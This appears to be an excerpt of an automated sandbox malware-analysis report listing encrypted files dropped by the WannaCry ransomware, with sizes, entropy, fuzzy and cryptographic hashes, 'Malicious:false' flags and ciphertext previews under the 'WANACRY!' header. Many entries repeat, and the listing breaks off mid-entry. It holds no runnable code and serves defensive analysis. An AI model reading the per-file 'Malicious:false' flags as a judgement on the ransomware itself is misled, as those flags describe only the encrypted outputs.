                                                                              Entropy (8bit):7.848881927922129
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkJZXedobhMS6DhBzj8rRlemPDYV1m0aDK7N/dDLqT2vaKvHY4aYH8wY4fd:bkJU7BgleMgmDENF2QPw+39
                                                                              MD5:60194039C4F7935989BCBABC84BE3063
                                                                              SHA1:CB7A31A367C05BA7393A84239514A6998E0CA04B
                                                                              SHA-256:E82ECBD16B46E5825D62BABC0D9B00F1457CF78DA5E9E670290C065B4256AA55
                                                                              SHA-512:5EA802EA6616208357B79F91B0E641EDDE808463F7557A76ED4A8054B364FDE34BCEA85CDDCC4779B3BA9EE5B8FF279C3BE0B4F18AB49A2A7FF881C9A2CCF9B0
                                                                              Malicious:false
                                                                              Preview:WANACRY!......hCBD.<h?.q.t..GN.:V7..._...0.n4..p..1d.Mhw..).=..........Uo.(..C.$..0....V.....Y.N....t.1...dQ.B=...6..DAH.x...v...C...v..V..twm..Oa......42..@S8...J.sM..?...Y.[.....T.@{[.S`BU.c@...g.#..kf..g.xB'5.RgWQ..k..+.g}\.g=..<..<a.}......X....@eM..9..............?Y$/~.~..WP*]<".X$...@GE...\.Y.V?#n.T.....eMht.u..n.0...........v._..f.....}_.x!.....H`.QYBY..~y.Y.x.O.o..?]I.=....+.T...g.*.w.k-...Pt.On.`...r.7.hYX.e}#...b_.K...D9*....zg..AS...NY.L..Ju.]...D..{...?.p.)]..U.[...Q.y..f.|.>0..!'.4U.>..1v.vp..z...+.G....!..;{j..D..>.;.5.............V.....Tu<e.]....=..'.. ..=.>.."TQuw....2.I/i3...r&.J....(.U.F.U.....oZf..U..m.....8...d....;.....S].....w...b4tz.../.3.........8J.p......=..dh.....m.{....D..9.86..t.n....o...'.3....S..UT.Ct...W.Gl.a.....Ld.{.WK.JB..>S2.=...2S......MG.An..p....X.|RK........vy..d...J./..0...jzA..2......:..w......o7.)......j.W..a.....m..05.._....q.N.......DA..p>.V...H...k6.2K9k,.|..I..T..F.u J].]....d..g5...w
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.839871619652545
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkC8bvJM2EyNnhIyZIBM8zhzLmCVDC98FarLutWPt0KGrt6khs+ulGq:bkC8bJjNnB2B1ZVu98gLk/nrt6i3ulH
                                                                              MD5:3309601B4DC9C5FC2E6E81D43660750B
                                                                              SHA1:CC599FF8D8A53AD3697D1975DE3F926EA5265392
                                                                              SHA-256:FD2BEA78D86915CCB8A9A08ABD486C4BD43DC457A25CAF3568A904246987E140
                                                                              SHA-512:441A77A206B666AC33AB822A6704212DF6D914CAB534E9C60052FDB4B9D727B0DE7933A2425D9B7E0DD9C6D14536F04966491B546E79F6287C72471F7969BBB8
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....\_.......:....v...p....T.K....../.B.o..TCFZ.a....D......SV......FoSo.Y.r./..*X...:K.._G...F..|x.....b^.m..s.......M9.a.H......-`7'x.s..H2.ps.o .....M.b....H.j...f.q.&.......[A...Sio.HS{..D.0R.....c.....pQ...q.9.k......G..db33.J.Gm.....`..S-P............nY..k_!...VxQ.............#...I.....c.h....g_-S.O`ip....if..F:d..L..H...9...1............r=.Dh?...e.....(g...A........0...UZ/..A.TeX?...3..HR#..!.,..^o........p...e....g.K.;k...U..h..q#...P.`Ty...9t.|tBHJ..[...lb/...'.N....cq.....h../.~k.....4l..k...*..S`....t..X.J....n.....t....8P.Nx*.#..........y'....l"...:.A(.#.L..F7Rc.......Ktc....aj.....n...........T.LR.Y.>o)f...c&..:..."..~....u....%..%..y...`...K....r/R.`2e. g..^r..9moD..*./]]...-W,").....K.gL..4.....J..}#.}i..,o..o....>@..e~.N.%...~..n.b.D...S.N.W.P.E.@..NC@!]<.Gu.1.).....u.^.y..-.k.Z....J.r.....|t.;t.B..u...I....3....o.)..2NdP.$4......XQE.!..2.5/..40...U..h .~./.DGH....9..@....?cs_g\r.&aE.++.I.R...X.."+.~..RF.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.839871619652545
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkC8bvJM2EyNnhIyZIBM8zhzLmCVDC98FarLutWPt0KGrt6khs+ulGq:bkC8bJjNnB2B1ZVu98gLk/nrt6i3ulH
                                                                              MD5:3309601B4DC9C5FC2E6E81D43660750B
                                                                              SHA1:CC599FF8D8A53AD3697D1975DE3F926EA5265392
                                                                              SHA-256:FD2BEA78D86915CCB8A9A08ABD486C4BD43DC457A25CAF3568A904246987E140
                                                                              SHA-512:441A77A206B666AC33AB822A6704212DF6D914CAB534E9C60052FDB4B9D727B0DE7933A2425D9B7E0DD9C6D14536F04966491B546E79F6287C72471F7969BBB8
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....\_.......:....v...p....T.K....../.B.o..TCFZ.a....D......SV......FoSo.Y.r./..*X...:K.._G...F..|x.....b^.m..s.......M9.a.H......-`7'x.s..H2.ps.o .....M.b....H.j...f.q.&.......[A...Sio.HS{..D.0R.....c.....pQ...q.9.k......G..db33.J.Gm.....`..S-P............nY..k_!...VxQ.............#...I.....c.h....g_-S.O`ip....if..F:d..L..H...9...1............r=.Dh?...e.....(g...A........0...UZ/..A.TeX?...3..HR#..!.,..^o........p...e....g.K.;k...U..h..q#...P.`Ty...9t.|tBHJ..[...lb/...'.N....cq.....h../.~k.....4l..k...*..S`....t..X.J....n.....t....8P.Nx*.#..........y'....l"...:.A(.#.L..F7Rc.......Ktc....aj.....n...........T.LR.Y.>o)f...c&..:..."..~....u....%..%..y...`...K....r/R.`2e. g..^r..9moD..*./]]...-W,").....K.gL..4.....J..}#.}i..,o..o....>@..e~.N.%...~..n.b.D...S.N.W.P.E.@..NC@!]<.Gu.1.).....u.^.y..-.k.Z....J.r.....|t.;t.B..u...I....3....o.)..2NdP.$4......XQE.!..2.5/..40...U..h .~./.DGH....9..@....?cs_g\r.&aE.++.I.R...X.."+.~..RF.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.84484573988243
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkidIMK/frZkatNzUvIGoe5KLMuHCqoOYAwSPXRzoBtpV/HEtZOMk4FzS:bkidrKtkatNzUvIqcMuHCq5xwS/JoBtz
                                                                              MD5:30B79531E41B2442E360996330A91A1C
                                                                              SHA1:62FADF465DB17026550A7C8200469F55DF3D3759
                                                                              SHA-256:D482464A8C7DB6BFDA5EEEED033CA9452A4D098D36E9BFF6413191B00B5B72FA
                                                                              SHA-512:ABB951D12400D75CC0E6732BF9FCFA03DB3B485B52C1AFF69F0AD7720790AFA1C190D9E2F1385500A09371404689B35EB1955864EC9B15CACF3CF7DC6DF58771
                                                                              Malicious:false
                                                                              Preview:WANACRY!......S.G......G.)....r....R.&..m.by..+.{wq.0...*c..z.~...66...+....<.l..M......8......z..H1.y..<.....l...b...Y\.....H~x.E.<..../..X..a.,.....(S..(.......0...N......a.."I...R...`..).Z.XJ....b.....OB.uE..9$Lk.z.x..7a.2...3....,m.Pt........J.".................]~c.G.#....'ey...)..._9........;V...,c.......y...L.R.T...T.3.G...N.,.o...G.?..W../i:..s... i..0..P..c...zp...]./..ti.. ..{.^...m..%..R7?....[...\.hA...kT..x.WV.O...(...%.).Ge....@K.RW].8...I..T.^.+..E.>.w.D9..9s.M...t1...#..T..Z.......S.#.....J..........6..@.q...!b.dN~..l1..GS.\X..R..~L........r.il...~........%.......@.<n.7K..d.0.)M.....>z...u..E.3.....6[3.%`8_j......k...lN7v..aEA...n.g...k...Kw..*......._u....:..P.-h"...`..L.(...bRQ.UHR)c2..Uk....X..h....Ou.~mis.oF........+..+.SR.....C<.3.+'..#zT...Nr...TZ ...a..sNz#.=J.>.0.U..].y.,..g.E.....@.`....E.d..N8..3.:..7..|.....u6~..".r.o\..#..Eh..d.~Fr.h.Er;....vn.....*.^5u...w..;j..$....6......d......uu*.Y..3J..._..i....U
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.84484573988243
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkidIMK/frZkatNzUvIGoe5KLMuHCqoOYAwSPXRzoBtpV/HEtZOMk4FzS:bkidrKtkatNzUvIqcMuHCq5xwS/JoBtz
                                                                              MD5:30B79531E41B2442E360996330A91A1C
                                                                              SHA1:62FADF465DB17026550A7C8200469F55DF3D3759
                                                                              SHA-256:D482464A8C7DB6BFDA5EEEED033CA9452A4D098D36E9BFF6413191B00B5B72FA
                                                                              SHA-512:ABB951D12400D75CC0E6732BF9FCFA03DB3B485B52C1AFF69F0AD7720790AFA1C190D9E2F1385500A09371404689B35EB1955864EC9B15CACF3CF7DC6DF58771
                                                                              Malicious:false
                                                                              Preview:WANACRY!......S.G......G.)....r....R.&..m.by..+.{wq.0...*c..z.~...66...+....<.l..M......8......z..H1.y..<.....l...b...Y\.....H~x.E.<..../..X..a.,.....(S..(.......0...N......a.."I...R...`..).Z.XJ....b.....OB.uE..9$Lk.z.x..7a.2...3....,m.Pt........J.".................]~c.G.#....'ey...)..._9........;V...,c.......y...L.R.T...T.3.G...N.,.o...G.?..W../i:..s... i..0..P..c...zp...]./..ti.. ..{.^...m..%..R7?....[...\.hA...kT..x.WV.O...(...%.).Ge....@K.RW].8...I..T.^.+..E.>.w.D9..9s.M...t1...#..T..Z.......S.#.....J..........6..@.q...!b.dN~..l1..GS.\X..R..~L........r.il...~........%.......@.<n.7K..d.0.)M.....>z...u..E.3.....6[3.%`8_j......k...lN7v..aEA...n.g...k...Kw..*......._u....:..P.-h"...`..L.(...bRQ.UHR)c2..Uk....X..h....Ou.~mis.oF........+..+.SR.....C<.3.+'..#zT...Nr...TZ ...a..sNz#.=J.>.0.U..].y.,..g.E.....@.`....E.d..N8..3.:..7..|.....u6~..".r.o\..#..Eh..d.~Fr.h.Er;....vn.....*.^5u...w..;j..$....6......d......uu*.Y..3J..._..i....U
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.83791390014475
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkHe26zwkTGederiqk/9Y5aqKo4tw4kKIWozLibGlbqvUsAi8Fnmvs0B:bkH56MkJ7q0SGo4tJrI91ps/
                                                                              MD5:6883B1B840A74C6911F751B4F69CD704
                                                                              SHA1:745B11F3622CDCC6A2E085F958A71596F4231C3C
                                                                              SHA-256:2626B6F999F8623B8B9B57F2E32ADC99E59B738509AEAF0C6C7C34EA09A75B75
                                                                              SHA-512:6765ADDC50AA30C5FDD9DFAFE91CE096F46F2C0E0AA750A589BE52EE978F09547BEF54DA26942123D68963B76D339C0B7AA9237DBEBB962D90FAFEE15CF7BCC6
                                                                              Malicious:false
                                                                              Preview:WANACRY!....7)..8.......CU.zi...,...#k...sS.H..... S#.U...........sv..Il.oL..L.K..2...1.e....-..@..m~.:......z+~.o...s..4....S.....[.k.N.FPqG....4.u...o..,^....cE...:.9..r..FK.J....,D.aO ..Kc.k)....Q.....c.7...n1...Ka.f.}.LM..n.......Z...F....R.............}.%......t..5...{K.....S........U...(.P.:..)W).T......q$z.D_1w..Y.I.M....+..Y2.Ks...X....Z......T.4._{.b../.6{Gi.ELV..[.`6j..^..@..1..@.z.].I.-.....hv.....1P..M.F....).P...q.AR..7.KsN.]^F.\...I:6bx,...o...Rd.O,8...K..[;.....k>.-..nA..m..2D....>.-...U..c..x.....k.:QA...Lp...*.u..J.I.X...G../.A..8 .\..^..?.Xd..+z.....DW...lhO....|.}...H......G2.Q.?..Z..*s. ..{.Dl....x6t..]....{.@.B.U..j.)n...<l....p..H.H.z.m.L....IcYY........'..... ..7.7....$......yy....+.%...'y+.V....{.$..V.7.......B...a..m}../...........?.K-.....j...F.i..U.......X7.\.:@..^hmm..Z...E;.....GdL.Mu.j...0.I...l.t[.Dl8..3..d/c.x@.d.......[..N.....f.._;h..)..g....oD...| .Q.Npi.# K...O.pR.......!s.z.3..]D....7m......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.83791390014475
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkHe26zwkTGederiqk/9Y5aqKo4tw4kKIWozLibGlbqvUsAi8Fnmvs0B:bkH56MkJ7q0SGo4tJrI91ps/
                                                                              MD5:6883B1B840A74C6911F751B4F69CD704
                                                                              SHA1:745B11F3622CDCC6A2E085F958A71596F4231C3C
                                                                              SHA-256:2626B6F999F8623B8B9B57F2E32ADC99E59B738509AEAF0C6C7C34EA09A75B75
                                                                              SHA-512:6765ADDC50AA30C5FDD9DFAFE91CE096F46F2C0E0AA750A589BE52EE978F09547BEF54DA26942123D68963B76D339C0B7AA9237DBEBB962D90FAFEE15CF7BCC6
                                                                              Malicious:false
                                                                              Preview:WANACRY!....7)..8.......CU.zi...,...#k...sS.H..... S#.U...........sv..Il.oL..L.K..2...1.e....-..@..m~.:......z+~.o...s..4....S.....[.k.N.FPqG....4.u...o..,^....cE...:.9..r..FK.J....,D.aO ..Kc.k)....Q.....c.7...n1...Ka.f.}.LM..n.......Z...F....R.............}.%......t..5...{K.....S........U...(.P.:..)W).T......q$z.D_1w..Y.I.M....+..Y2.Ks...X....Z......T.4._{.b../.6{Gi.ELV..[.`6j..^..@..1..@.z.].I.-.....hv.....1P..M.F....).P...q.AR..7.KsN.]^F.\...I:6bx,...o...Rd.O,8...K..[;.....k>.-..nA..m..2D....>.-...U..c..x.....k.:QA...Lp...*.u..J.I.X...G../.A..8 .\..^..?.Xd..+z.....DW...lhO....|.}...H......G2.Q.?..Z..*s. ..{.Dl....x6t..]....{.@.B.U..j.)n...<l....p..H.H.z.m.L....IcYY........'..... ..7.7....$......yy....+.%...'y+.V....{.$..V.7.......B...a..m}../...........?.K-.....j...F.i..U.......X7.\.:@..^hmm..Z...E;.....GdL.Mu.j...0.I...l.t[.Dl8..3..d/c.x@.d.......[..N.....f.._;h..)..g....oD...| .Q.Npi.# K...O.pR.......!s.z.3..]D....7m......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.840261919111009
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkO4S7uUdmjcWGa9qSpVcLx/DCpLOZVBmTH80mcTJGwQoERv0oTeEDQyQF2knW:bkO4+VdscWG4qaqx/5zcTJGxommEMyKQ
                                                                              MD5:A3A010795B2A9403DCE60750D7ED161D
                                                                              SHA1:8A4939D1288B7E743B253FAB99BA6CD1554EE3BF
                                                                              SHA-256:DE0BEDC4A89CCCDEF2125AC43D6D12CEA234C0975A46C8AC37529A20380271DE
                                                                              SHA-512:9A927D5FE99D7E35081C73F4F324824BF26AD2FFC0751D0030A7C41E8C9F168282AD0150A2576527126FB51E89D42DA5B853E09885C61B1EE63DAC43ACD10923
                                                                              Malicious:false
                                                                              Preview:WANACRY!....I......;..zVz$%.aS.s....3@....:...o...CdDV#..m.=Rq...*...].7..p......h..V..4..Mh:l..^.....F.$u.....I%...p....o..."j2.xR..dKm......U.!/....;2Y6......~.D.D.l.Z9?.v..{......!....U...v.'."|....).-.......iq..nDv.cD.)I.e..w<H,.....U.D....vwh..M.yY.S.[...............B.....:.K[..].k.._.,D..Y....a.>5..?.........^....%.......3..6.#L-d..>)'.G.......K.....aJ>gL.)4U.............R.M..".W.&..X...G?.VS..... ...)e..Z].lp..V.....pRpLGO.":.m.hD..kG..B.s.?.........r`.V7>"(r.^P.}.K..]...Q\.]..{.)t..l...\|aa...h^.@..!.*...x".!@.x....."I....gT.(U.......0NG...s%.B.wh|.{xR....O.2....+'!.%U.....C.XB..z..'.Y~..v.E..x."2...e....l0....g.=...M..].\Rn.Z.B........n{.?..w.....^h...<\..*^...Uf.t..o.a..4{...\D.ii....6Tf.....6..vz.h..7ev..+.x.+j...t..G..="..n...`{j>..Q-0.....w.4.i.O<........%....#c.......+0.9......q.......74V..{3h....g...........r.r.`.C.ANk....@.E.............{.."..........Qi.....~L3S.B..X.C..ikWW.U.:..^...4...:r...SRTt*hZ...!.y....M.A..lX.]..........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.840261919111009
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkO4S7uUdmjcWGa9qSpVcLx/DCpLOZVBmTH80mcTJGwQoERv0oTeEDQyQF2knW:bkO4+VdscWG4qaqx/5zcTJGxommEMyKQ
                                                                              MD5:A3A010795B2A9403DCE60750D7ED161D
                                                                              SHA1:8A4939D1288B7E743B253FAB99BA6CD1554EE3BF
                                                                              SHA-256:DE0BEDC4A89CCCDEF2125AC43D6D12CEA234C0975A46C8AC37529A20380271DE
                                                                              SHA-512:9A927D5FE99D7E35081C73F4F324824BF26AD2FFC0751D0030A7C41E8C9F168282AD0150A2576527126FB51E89D42DA5B853E09885C61B1EE63DAC43ACD10923
                                                                              Malicious:false
                                                                              Preview:WANACRY!....I......;..zVz$%.aS.s....3@....:...o...CdDV#..m.=Rq...*...].7..p......h..V..4..Mh:l..^.....F.$u.....I%...p....o..."j2.xR..dKm......U.!/....;2Y6......~.D.D.l.Z9?.v..{......!....U...v.'."|....).-.......iq..nDv.cD.)I.e..w<H,.....U.D....vwh..M.yY.S.[...............B.....:.K[..].k.._.,D..Y....a.>5..?.........^....%.......3..6.#L-d..>)'.G.......K.....aJ>gL.)4U.............R.M..".W.&..X...G?.VS..... ...)e..Z].lp..V.....pRpLGO.":.m.hD..kG..B.s.?.........r`.V7>"(r.^P.}.K..]...Q\.]..{.)t..l...\|aa...h^.@..!.*...x".!@.x....."I....gT.(U.......0NG...s%.B.wh|.{xR....O.2....+'!.%U.....C.XB..z..'.Y~..v.E..x."2...e....l0....g.=...M..].\Rn.Z.B........n{.?..w.....^h...<\..*^...Uf.t..o.a..4{...\D.ii....6Tf.....6..vz.h..7ev..+.x.+j...t..G..="..n...`{j>..Q-0.....w.4.i.O<........%....#c.......+0.9......q.......74V..{3h....g...........r.r.`.C.ANk....@.E.............{.."..........Qi.....~L3S.B..X.C..ikWW.U.:..^...4...:r...SRTt*hZ...!.y....M.A..lX.]..........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.827295905739057
                                                                              Encrypted:false
                                                                              SSDEEP:24:bky8pl9+FlByg8X0GLJ6XSSbj9lRHuxBqy72fz7zTnLnOX7VCoCABRGvK5OwQY27:bkTf+qE+QXSSn9lAxB9Cfz7zrSpCoCAO
                                                                              MD5:0D961AB72C2F5160986324A2DD3975F6
                                                                              SHA1:918C9255D184C5225C54790E6023AD28E6295D73
                                                                              SHA-256:4CB5A4DFD2BE0735FDB3CE5191625010867648694788C7F8100641ED33273408
                                                                              SHA-512:D4E05CC800333F13F687060A95A0DE0718AE350E3EA236A197B272A5B0884764B5436E088DF78BE42709114EA7F4A447ED770C309B0DA0CE74DEEB71B308756F
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......C....UG....=....y.V.Gq.z.f..k....F0..`....s..m.a=L.(.! .3.b&.LR.]...U-`_./.%..b.\s...si...pM..1.a;P...&P...p....>.d.k...,.[.Y.p...]..p.g-X..?<.....)....Z...dC..x..z....!..fw.J......)P..0..."{.OC;\Sb".C../..k._b.V....~{GeM...... xB:..&.C...................=|..s..~V8.U....P_T...[.aPzS1..g..e...9.....U...8K$..'b..m...7....K.t.L$.B..Q...@..J.v..e.w...]....5..nY)gY..N...g...P..9y..WC.,.=Rl....nU![]BkL...IQ.|P)z-.9../c...Z..%...b..Ed..f;p..P...6.....x{...u../.......;Y.z......l....C.J ...F.t'...}a.I..9...^`....w.+.st@b....^.j....".3OZ...H...h.E.(.YE..Y..-qk5..9..N..UOf.S.@.B....%.$.!<..j....C...z.z)j..p4e..0..S....,m.5........%m.Q.0.....!p<y....3.%.`..$.KZ....W..r".......s<.T.F.K@........2...\f.....:ho*ye..br...p*.$.a.2.qcY..Z..W..=Z5t.zX...\..y......q.d'.S[.mCj.l.qFDY....o...e....../...s.%.....|.z.L.,.....`U.c .P..+.....a.C..k.^./..l.a.v.NMg.4x..1.D.....l.]\O.)k#r.znk.>w.g.b............y.=.#>jd...bs(.&.4.%....%..#..q..yN.e....,.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.827295905739057
                                                                              Encrypted:false
                                                                              SSDEEP:24:bky8pl9+FlByg8X0GLJ6XSSbj9lRHuxBqy72fz7zTnLnOX7VCoCABRGvK5OwQY27:bkTf+qE+QXSSn9lAxB9Cfz7zrSpCoCAO
                                                                              MD5:0D961AB72C2F5160986324A2DD3975F6
                                                                              SHA1:918C9255D184C5225C54790E6023AD28E6295D73
                                                                              SHA-256:4CB5A4DFD2BE0735FDB3CE5191625010867648694788C7F8100641ED33273408
                                                                              SHA-512:D4E05CC800333F13F687060A95A0DE0718AE350E3EA236A197B272A5B0884764B5436E088DF78BE42709114EA7F4A447ED770C309B0DA0CE74DEEB71B308756F
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......C....UG....=....y.V.Gq.z.f..k....F0..`....s..m.a=L.(.! .3.b&.LR.]...U-`_./.%..b.\s...si...pM..1.a;P...&P...p....>.d.k...,.[.Y.p...]..p.g-X..?<.....)....Z...dC..x..z....!..fw.J......)P..0..."{.OC;\Sb".C../..k._b.V....~{GeM...... xB:..&.C...................=|..s..~V8.U....P_T...[.aPzS1..g..e...9.....U...8K$..'b..m...7....K.t.L$.B..Q...@..J.v..e.w...]....5..nY)gY..N...g...P..9y..WC.,.=Rl....nU![]BkL...IQ.|P)z-.9../c...Z..%...b..Ed..f;p..P...6.....x{...u../.......;Y.z......l....C.J ...F.t'...}a.I..9...^`....w.+.st@b....^.j....".3OZ...H...h.E.(.YE..Y..-qk5..9..N..UOf.S.@.B....%.$.!<..j....C...z.z)j..p4e..0..S....,m.5........%m.Q.0.....!p<y....3.%.`..$.KZ....W..r".......s<.T.F.K@........2...\f.....:ho*ye..br...p*.$.a.2.qcY..Z..W..=Z5t.zX...\..y......q.d'.S[.mCj.l.qFDY....o...e....../...s.%.....|.z.L.,.....`U.c .P..+.....a.C..k.^./..l.a.v.NMg.4x..1.D.....l.]\O.)k#r.znk.>w.g.b............y.=.#>jd...bs(.&.4.%....%..#..q..yN.e....,.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.84888405786118
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkW1laT5epVDA3apOT7KA5z54wlBHdvE+AapmPAIZUnFUSKu5Lg+FKj:bkWraoppOT7L514wlfhpqLUFB5LrFKj
                                                                              MD5:AE19167A6E385ACCAEEF580BCFF0E2E5
                                                                              SHA1:5FE0D352AAAD43F49AE42722CDEDD156777433B9
                                                                              SHA-256:ED5F0CC924EA74B55BF6918D20A0704DA833588F3B9C6CAF9CCA0F5C20C25630
                                                                              SHA-512:6E04F48899EF6D38B883F8065722E93AD04172FA67692311065A01DD9B44A8E7CB6EA406FCEAA158607856E57631CEC7ADFEFC673BA2EF47ADA339F3F35D4ED0
                                                                              Malicious:false
                                                                              Preview:WANACRY!....F..S............X...}...c.+.i...n%...j.....-m..W...q...IF....a..fn.G[y.....;.........uR.XN.......COc.TXl. .....Gn.e.G.<...5t..Q.Ry.../W."]q9.V.}C..+..C.......S.H.$T ).Q.%~ne.....}.B..K}Vi..'7...........0.g.v.#.....G.h.[+.j...).y1...l.&.M.C...............O.D.....75...pF....i.QQ....Tz.A..4..F....Du.m.......Ef..u[.....13.L.jw.`.9.]....B..i...&.T'.@b..`...6D.*}.dOz7........Y...U.Y.GrN*..i.........;{...azm...\C.{B"$.7u..,".C.....Y4S~....h......8.P..X..#...F....+$.}{.....2......>.]|L...mS.GF!-..k...-.hd..T6.z.N.\P.....h+.lm...+.......!..I..|y.7..............]Z.!.X..l.j......?D..<._?]...v..7`M|..a.._.....`9.]..gH..F..t"..D-..VYe4F.TP.3G..u....6.|...1s. .".....#...T^0..M.u.5..8..78..x#w....,........g...4.i^~d.....4(#..i../J.sD.....xY.b..i*n.Z......j. ^.iWO.S....1.u-M..>7.+..p.v\..:......h...<?..Yz.l..R.F..-..hk...&M....<.%....M.K...>..<)Y..T3.h.c..j......]M]E.8.y....0.T..r...HVF.0.....t?.:.8\T......'.J...n..P....y..iF.um'g V.....4.O.X.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.84888405786118
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkW1laT5epVDA3apOT7KA5z54wlBHdvE+AapmPAIZUnFUSKu5Lg+FKj:bkWraoppOT7L514wlfhpqLUFB5LrFKj
                                                                              MD5:AE19167A6E385ACCAEEF580BCFF0E2E5
                                                                              SHA1:5FE0D352AAAD43F49AE42722CDEDD156777433B9
                                                                              SHA-256:ED5F0CC924EA74B55BF6918D20A0704DA833588F3B9C6CAF9CCA0F5C20C25630
                                                                              SHA-512:6E04F48899EF6D38B883F8065722E93AD04172FA67692311065A01DD9B44A8E7CB6EA406FCEAA158607856E57631CEC7ADFEFC673BA2EF47ADA339F3F35D4ED0
                                                                              Malicious:false
                                                                              Preview:WANACRY!....F..S............X...}...c.+.i...n%...j.....-m..W...q...IF....a..fn.G[y.....;.........uR.XN.......COc.TXl. .....Gn.e.G.<...5t..Q.Ry.../W."]q9.V.}C..+..C.......S.H.$T ).Q.%~ne.....}.B..K}Vi..'7...........0.g.v.#.....G.h.[+.j...).y1...l.&.M.C...............O.D.....75...pF....i.QQ....Tz.A..4..F....Du.m.......Ef..u[.....13.L.jw.`.9.]....B..i...&.T'.@b..`...6D.*}.dOz7........Y...U.Y.GrN*..i.........;{...azm...\C.{B"$.7u..,".C.....Y4S~....h......8.P..X..#...F....+$.}{.....2......>.]|L...mS.GF!-..k...-.hd..T6.z.N.\P.....h+.lm...+.......!..I..|y.7..............]Z.!.X..l.j......?D..<._?]...v..7`M|..a.._.....`9.]..gH..F..t"..D-..VYe4F.TP.3G..u....6.|...1s. .".....#...T^0..M.u.5..8..78..x#w....,........g...4.i^~d.....4(#..i../J.sD.....xY.b..i*n.Z......j. ^.iWO.S....1.u-M..>7.+..p.v\..:......h...<?..Yz.l..R.F..-..hk...&M....<.%....M.K...>..<)Y..T3.h.c..j......]M]E.8.y....0.T..r...HVF.0.....t?.:.8\T......'.J...n..P....y..iF.um'g V.....4.O.X.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8592334727511455
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkr41ynuHJ+6YYVMB8SvG3uEmZ7sUuIwhu4S2iH:bkrgqupMYV/SHEEiIwhu4SV
                                                                              MD5:D5EAF9B80C6F743AA57E7E6B894CEF31
                                                                              SHA1:1F2645E4D0BA386ECA6B7783DEC75C11255160D8
                                                                              SHA-256:B3F073DB58CD7FB3397D8AC4A441DDE069D18D829EF41472C5D1AB5D3377E1C3
                                                                              SHA-512:F55529EC0FA96197591DB0D4CB48C3F19F896F6A4C9783CFF67C830E108C248129B18250AE419DB4364224799A80F794EF995AC7EEC2073A4B115F6A0BCD34F9
                                                                              Malicious:false
                                                                              Preview:WANACRY!..........F32....dN...k...^Nw......+.\...2.........~go.1|.....w*...cm.P0NS...6......x..H.....#'..S.[..-.&X#.66R.iR.!.F.6L.M5..PLk..g.1.........\.i........X......j.j6.Su1"w..S..(.,.L..*k.w.Xt........Y.......5....u.. ..6Cdny.o@...&ib.K.u-...l..........E............{.......^..$..K...6..lP.).~.~.O{.l.>#@d.J(. A.t..b......3..I.-..>2.v...S...>(.......n.V.0.h.VP4.Y&.....-Y..zP...YF...Zu.>F.@P.......;?.z?.&..|..|y...j....g..K..4...m4C.a....6....P....K..(%.4z.0..[..I.+.zT...j.............q...p.\..Fx.u$.........c2...w_`..7..[..=C..3.v.^.G.y*..f..~2N.&.VS....S@.8..a9...|6.b..7E,J_....+.M.b..V..].b.F_....3...."&...W=go..-w......!...<.|%f..m...G5..-|YJ.J^f.8H_aU..L..Jo..^.=J...P\.....J.!.u.~.U.6.....S....a.!D..........`....P..(n.L.k.....:.M.]...].K....h..S."Li$..../..[.mV.m..R..%a>....g..8...-...}.G..r(...^.P.*..A.ya.Q.....!CITD.R.Em(...{.a.:...,e...oJ:..RD..%.{B......n.J.(..}....../.T..W1..|g...)...=q..<(.c`..:=.T.9:..5..o.....B..y.F.,s..s.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8592334727511455
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkr41ynuHJ+6YYVMB8SvG3uEmZ7sUuIwhu4S2iH:bkrgqupMYV/SHEEiIwhu4SV
